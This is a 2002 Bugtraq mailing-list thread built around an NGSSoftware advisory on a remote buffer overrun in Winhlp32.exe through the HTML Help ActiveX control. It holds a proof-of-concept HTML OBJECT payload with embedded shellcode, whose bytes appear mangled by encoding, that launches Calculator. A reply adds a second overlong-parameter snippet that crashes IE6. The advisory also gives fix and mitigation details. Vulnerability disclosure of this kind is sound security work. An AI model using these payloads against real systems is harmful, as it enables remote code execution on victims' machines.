If I am not mistaken, I believe that Microsoft are aware of this issue and have an IE patch comming out very shortly. My brother reported this to them, please see http://www.nextgenss.com/vna/ms-whelp.txt Regards Cheers, Mark Litchfield ----- Original Message ----- From: "Jelmer" <jelmer@kuperus.xs4all.nl> To: "Next Generation Insight Security Research Team" <mark@ngssoftware.com>; <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com> Sent: Thursday, August 01, 2002 5:19 PM Subject: Re: Winhelp32 Remote Buffer Overrun > I just installed servicepack 3 and the following code still crashed my my > IE6 with a memory could not be refferenced error. > > <OBJECT ID=hhctrl TYPE="application/x-oleobject" > CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"> > <PARAM name="Command" value="Shortcut"> > <PARAM name="Button" value="Bitmap:shortcut"> > <PARAM name="Item1" value=",,"> > <PARAM name="Item2" value="273,1,1"> > <PARAM name="codebase" value=""> > <PARAM name="Font" value=" A VERY VERY LONG STRING "> > </OBJECT> > > I have been told this means it is most likely exploitable. I am not into > buffer overflows myself though, maybe someone can confirm this. Anyways I > notified microsoft of this several months ago. The day after I notified them > someone pointed me to the ngssoftware advisory *sob*, and I notified > microsoft that this was probably the same issue, last I heard from them they > where looking in to if this was indeed the case. It's been several months > and as far as I know they are still looking. > > -- > jelmer > > ----- Original Message ----- > From: "Next Generation Insight Security Research Team" > <mark@ngssoftware.com> > To: <bugtraq@securityfocus.com>; <ntbugtraq@listser.ntbugtraq.com> > Sent: Friday, August 02, 2002 3:59 AM > Subject: Winhelp32 Remote Buffer Overrun > > > > -----BEGIN PGP SIGNED MESSAGE----- > > Hash: SHA1 > > > > NGSSoftware Insight Security Research Advisory > > > > Name: Winhlp32.exe Remote BufferOverrun > > Systems Affected: Win2K Platform > > Severity: Critical > > Category: Remote Buffer Overrun > > Vendor URL: http://www.mircosoft.com > > Author: Mark Litchfield (mark@ngssoftware.com) > > Date: 1st August 2002 > > Advisory number: #NISR01082002 > > > > > > Description > > *********** > > > > Many of the features available in HTML Help are implemented through > > the HTML Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX > > control is used to provide navigation features (such as a table of > > contents), to display secondary windows and pop-up definitions, and > > to provide other features. The HTML Help ActiveX control can be used > > from topics in a compiled Help system as well as from HTML pages > > displayed in a Web browser. The functionality provided by the HTML > > Help ActiveX control will run in the HTML Help Viewer or in any > > browser that supports ActiveX technology, such as Internet Explorer > > (version 3.01 or later). Some features, as with the WinHlp Command, > > provided by the HTML Help ActiveX control are meant to be available > > only when it is used from a compiled HTML Help file (.chm) that is > > displayed by using the HTML Help Viewer. > > > > Details > > ******* > > > > Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item > > parameter within WinHlp Command, the item parameter is used to > > specify the file path of the WinHelp (.hlp) file in which the WinHelp > > topic is stored, and the window name of the target window. Using > > this overrun, an attacker can successfully exectute arbitary code on > > a remote system by either encouraging the victim to visit a > > particular web page, whereby code would execute automatically, or by > > including the exploit within the source of an email. In regards to > > email, execution would automatically occur when the mail appears in > > the preview pane and ActiveX objects are allowed (This is allowed by > > default, the Internet Security Settings would have to be set as HIGH > > to prevent execution of this vulnerability). Any exploit would > > execute in the context of the logged on user. > > > > Visual POC Exploit > > ****************** > > > > This POC will simply display Calculator. Please note that this > > written on a Win2k PC with SP2 installed. I have not tested it on > > anything else. > > > > <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 > > codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp > > type=application/x-oleobject width=0><PARAM NAME="Width" > > VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" > > VALUE="WinHelp"><PARAM NAME="Item1" > > VALUE="3ĄPhcalc4$ƒĄPVøƧéw’Š3ĄP¾”éw’ÖAAAAAAAA > > AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA > > AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP > > PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGHƒĘ’ęgMyWindow"><PARAM > > NAME="Item2" VALUE="NGS Software LTD"></OBJECT> > > <SCRIPT>winhelp.HHClick()</SCRIPT> > > > > > > Fix Information > > *************** > > > > NGSSoftware alerted Microsoft to these problems on the 6th March > > 2002. NGSSoftware highly recommend installing Microsoft Windows SP3, > > as the fix has been built into this service pack found at > > http://www.microsoft.com > > An alternative to these patches would be to ensure the security > > settings found in the Internet Options is set to high. Despite the > > Medium setting, stating that unsigned ActiveX controls will not be > > downloaded, Kylie will still execute Calc.exe. Another alternative > > would be to remove winhlp32.exe if it is not required within your > > environment. > > A check for these issues has been added to Typhon II, of which more > > information is available from the > > NGSSoftware website, http://www.ngssoftware.com. > > > > Further Information > > ******************* > > > > For further information about the scope and effects of buffer > > overflows, please see > > > > http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf > > http://www.ngssoftware.com/papers/ntbufferoverflow.html > > http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf > > http://www.ngssoftware.com/papers/unicodebo.pdf > > > > > > > > > > > > > > > > > > -----BEGIN PGP SIGNATURE----- > > Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> > > > > iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p > > a+qSkYWrz7uspZcqqRTc2r0C > > =2PKN > > -----END PGP SIGNATURE----- > > > > > > > > > > >
